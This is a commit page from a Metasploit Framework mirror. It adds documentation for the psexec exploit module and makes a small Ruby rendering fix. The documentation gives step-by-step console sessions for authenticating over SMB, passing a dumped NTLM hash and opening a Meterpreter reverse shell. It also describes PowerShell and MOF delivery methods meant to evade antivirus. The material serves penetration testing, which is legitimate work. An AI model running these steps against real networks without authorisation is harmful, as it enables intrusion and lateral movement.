infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add module documentation for psexec

bug/bundler_fix
wchen-r7 2016-03-01 18:52:47 -06:00
parent 99d593e9a0
commit f27d24fd60
2 changed files with 147 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

142
documentation/modules/exploit/windows/smb/psexec.md Normal file
View File

@ -0,0 +1,142 @@
psexec is one of the most popular exploits against Microsoft Windows. It is a great way to test
password security, and demonstrate how a stolen password could lead to a complete compromise of an
entire corporate network.
The Metasploit Framework actually includes different module types of psexec for different
scenarios. exploit/windows/smb/psexec is the father of them all, and is used the same way
you normally would with any Metasploit exploits.
## Vulnerable Application
To be able to use exploit/windows/smb/psexec, you must meet these requirements:
1. You have a valid username/password.
2. Firewall allows SMB.
2. The remote Windows machine's network security policy allows it. If you see [one of these errors](https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex%3A%3AProto%3A%3ASMB-Error-mean%3F), it's an indication it doesn't.
## Verification Steps
Please see Basic Usage under Overview.
## Options
By default, exploit/windows/smb/psexec can be as simple as setting the RHOST option, and ready to
go. But in reality, you will probably need to at least configure:
**The SMBUser Option**
A valid Windows username.
**The SMBPass option**
This can be either the plain text version, or the Windows hash.
## Scenarios
**Typical Usage**
Password stealing is always the first thing in order to use psexec. How you will be able to do that
really depends on the situation. But one thing for sure, if psexec is possible, so should smb_login.
The following shows the basic workflow of using both modules and gain access:
1. use auxiliary/scanner/smb/smb_login (please refer to that module documentation to learn usage)
2. Assuming you have found a good password, use psexec like the following:
```
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.80
RHOST => 192.168.1.80
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass goodpass
SMBPass => goodpass
msf exploit(psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.199:4444
[*] 192.168.1.80:445 - Connecting to the server...
[*] 192.168.1.80:445 - Authenticating to 192.168.1.80:445 as user 'Administrator'...
[*] 192.168.1.80:445 - Selecting native target
[*] 192.168.1.80:445 - Uploading payload...
[*] 192.168.1.80:445 - Created \PTIhqIrQ.exe...
[+] 192.168.1.80:445 - Service started successfully...
[*] 192.168.1.80:445 - Deleting \PTIhqIrQ.exe...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1042) at 2016-03-01 16:51:56 -0600
meterpreter >
```
**Pass the Hash**
One common penetration testing scenario with using psexec is that attackers usually begin by
breaking into a box, manage to the dump the hashes, and use some of those hashes to log into
other boxes on the network using psexec. So let's say I'm in that scenario with the following
stolen hash:
```
meterpreter > hashdump
Administrator:500:e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f:::
```
Without the need to crack the hash, I can simply copy and paste it to the SMBPass option in
psexec, and get a session:
```
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f
SMBPass => e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f
msf exploit(psexec) > set RHOST 192.168.1.80
RHOST => 192.168.1.80
msf exploit(psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.199:4444
[*] 192.168.1.80:445 - Connecting to the server...
[*] 192.168.1.80:445 - Authenticating to 192.168.1.80:445 as user 'Administrator'...
[*] 192.168.1.80:445 - Selecting native target
[*] 192.168.1.80:445 - Uploading payload...
[*] 192.168.1.80:445 - Created \QpxKDHyG.exe...
[+] 192.168.1.80:445 - Service started successfully...
[*] 192.168.1.80:445 - Deleting \QpxKDHyG.exe...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1043) at 2016-03-01 17:02:46 -0600
meterpreter >
```
**Automatic Target**
exploit/windows/smb/psexec comes with multiple targets available, and Automatic is default. What
happens under the hood is if Powershell is detected on the remote machine, it will try Powershell,
otherwise it uses the natvie upload. Each target is explained below.
**Powershell Target**
The Powershell target forces the psexec module to run a Powershell command with a payload embedded
in it. Since this approach does not leave anything on disk, this is a very powerful way to evade
antivirus, however, older Windows machines might not support Powershell by default.
Ideally, you probably want to use the Automatic target setting instead of this since it will check
if Powershell is possible first.
**Native Upload Target**
By default, the Native target will attempt to upload the payload (executable) to SYSTEM32, and then
execute it with psexec. This approach is rather reliable, but has a high chance of getting caught
by antivirus on the target.
**MOF Upload Target**
The MOF target technically does not use psexec: it does not explicitly tell Windows to execute
anything. All it does is uploading two files: the payload (exe) in SYSTEM32, and a managed object
format file in SYSTEM32\wbem\mof\ directory. When Windows sees the mof file in that directory, it
automatically runs it. Once executed, the code inside the mof file basically tells Windows to
execute our payload in SYSTEM32, and we get a session.
Although a neat trick, Metasploit's MOF library only works against Windows XP and
Windows Server 2003. And since it does write files to disk, there is also a high chance of getting
caught by antivirus on the target.

6
lib/msf/util/document_generator/normalizer.rb
View File

@ -15,8 +15,12 @@ module Redcarpet
def list(content, list_type)
if list_type == :unordered && content.scan(/<li>/).flatten.length > 15
%Q|<p><div id=\"long_list\"><ul>#{content}<ul></div></p>|
else
elsif list_type == :unordered
%Q|<ul>#{content}</ul>|
elsif list_type == :ordered
%Q|<ol>#{content}</ol>|
else
content
end
end